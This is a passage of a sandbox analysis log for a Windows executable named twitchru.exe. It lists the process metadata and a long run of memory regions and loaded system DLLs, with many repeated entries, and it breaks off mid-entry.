# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Nov 29 2018 14:58:43 # Log Creation Date: 06.12.2018 21:42:18.296 Process: id = "1" image_name = "twitchru.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe" page_root = "0x4a5b000" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9 start_va = 0x400000 end_va = 0x48afff entry_point = 0x400000 region_type = mapped_file name = "twitchru.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe") Region: id = 10 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 17 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 158 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 159 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 160 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 161 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 162 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 163 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 164 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 240 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 241 start_va = 0x230000 end_va = 0x2edfff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 242 start_va = 0x74ca0000 end_va = 0x74d30fff entry_point = 0x74ca0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 243 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 244 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 245 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 246 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 247 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 248 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 249 start_va = 0x6a0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 250 start_va = 0x7a0000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 251 start_va = 0x74a00000 end_va = 0x74a1bfff entry_point = 0x74a00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 252 start_va = 0x74a20000 end_va = 0x74a29fff entry_point = 0x74a20000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 253 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 254 start_va = 0x74a40000 end_va = 0x74a5afff entry_point = 0x74a40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 255 start_va = 0x74a60000 end_va = 0x74a6dfff entry_point = 0x74a60000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\SysWOW64\\wmiclnt.dll" (normalized: "c:\\windows\\syswow64\\wmiclnt.dll") Region: id = 256 start_va = 0x74a70000 end_va = 0x74a9ffff entry_point = 0x74a70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 257 start_va = 0x74aa0000 end_va = 0x74aaffff entry_point = 0x74aa0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 258 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "traffic.dll" filename = "\\Windows\\SysWOW64\\traffic.dll" (normalized: "c:\\windows\\syswow64\\traffic.dll") Region: id = 259 start_va = 0x74ac0000 end_va = 0x74acefff entry_point = 0x74ac0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 260 start_va = 0x74ad0000 end_va = 0x74b61fff entry_point = 0x74ad0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 261 start_va = 0x74b70000 end_va = 0x74b82fff entry_point = 0x74b70000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 262 start_va = 0x74b90000 end_va = 0x74be2fff entry_point = 0x74b90000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 263 start_va = 0x74bf0000 end_va = 0x74bf7fff entry_point = 0x74bf0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 264 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 265 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 266 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 267 start_va = 0x75220000 end_va = 0x75255fff entry_point = 0x75220000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 268 start_va = 0x753b0000 end_va = 0x753f3fff entry_point = 0x753b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 269 start_va = 0x75430000 end_va = 0x767eefff entry_point = 0x75430000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 270 start_va = 0x76810000 end_va = 0x7681efff entry_point = 0x76810000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 271 start_va = 0x768b0000 end_va = 0x76999fff entry_point = 0x768b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 272 start_va = 0x769b0000 end_va = 0x76a0bfff entry_point = 0x769b0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 273 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 274 start_va = 0x76a90000 end_va = 0x76c34fff entry_point = 0x76a90000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 275 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 276 start_va = 0x76c90000 end_va = 0x76d21fff entry_point = 0x76c90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 277 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 278 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 279 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 280 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 281 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 282 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 283 start_va = 0x773e0000 end_va = 0x773e6fff entry_point = 0x773e0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 284 start_va = 0x773f0000 end_va = 0x778ccfff entry_point = 0x773f0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 285 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 286 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 287 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 288 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 289 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 290 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 291 start_va = 0x8a0000 end_va = 0xa27fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 292 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 293 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 294 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 295 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 296 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x3f0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 297 start_va = 0x510000 end_va = 0x511fff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 298 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 299 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 300 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 301 start_va = 0xa30000 end_va = 0xbb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 302 start_va = 0xbc0000 end_va = 0x1fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 303 start_va = 0x1fc0000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 304 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 305 start_va = 0x1fc0000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 306 start_va = 0x20d0000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 307 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 308 start_va = 0x74c20000 end_va = 0x74c94fff entry_point = 0x74c20000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 309 start_va = 0x20e0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 310 start_va = 0x2120000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 311 start_va = 0x20c0000 end_va = 0x20c3fff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 312 start_va = 0x21a0000 end_va = 0x24d6fff entry_point = 0x21a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 313 start_va = 0x20e0000 end_va = 0x20e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 314 start_va = 0x2110000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 315 start_va = 0x24e0000 end_va = 0x2597fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 316 start_va = 0x20e0000 end_va = 0x20e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 317 start_va = 0x20f0000 end_va = 0x20f3fff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 318 start_va = 0x74c00000 end_va = 0x74c1cfff entry_point = 0x74c00000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 319 start_va = 0x2100000 end_va = 0x2106fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 320 start_va = 0x25a0000 end_va = 0x25a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 321 start_va = 0x747f0000 end_va = 0x749f8fff entry_point = 0x747f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 324 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x25b0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 325 start_va = 0x25c0000 end_va = 0x25c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025c0000" filename = "" Region: id = 326 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 327 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 328 start_va = 0x25d0000 end_va = 0x25dbfff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 329 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 330 start_va = 0x25f0000 end_va = 0x25f0fff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 331 start_va = 0x2600000 end_va = 0x2600fff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 332 start_va = 0x747a0000 end_va = 0x747e3fff entry_point = 0x747a0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 333 start_va = 0x2610000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 334 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 335 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 336 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 337 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 338 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 339 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 340 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 341 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 342 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 343 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 344 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 345 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 346 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 347 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 348 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 349 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 350 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 351 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 352 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 353 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 354 start_va = 0x2720000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 355 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 356 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 357 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 358 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 359 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 360 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 361 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 362 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 363 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 364 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 365 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 366 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 367 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 368 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 369 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 370 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 371 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 372 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 373 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 374 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 375 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 376 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 377 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 378 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 379 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 380 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 381 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 382 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 383 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 384 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 385 start_va = 0x2710000 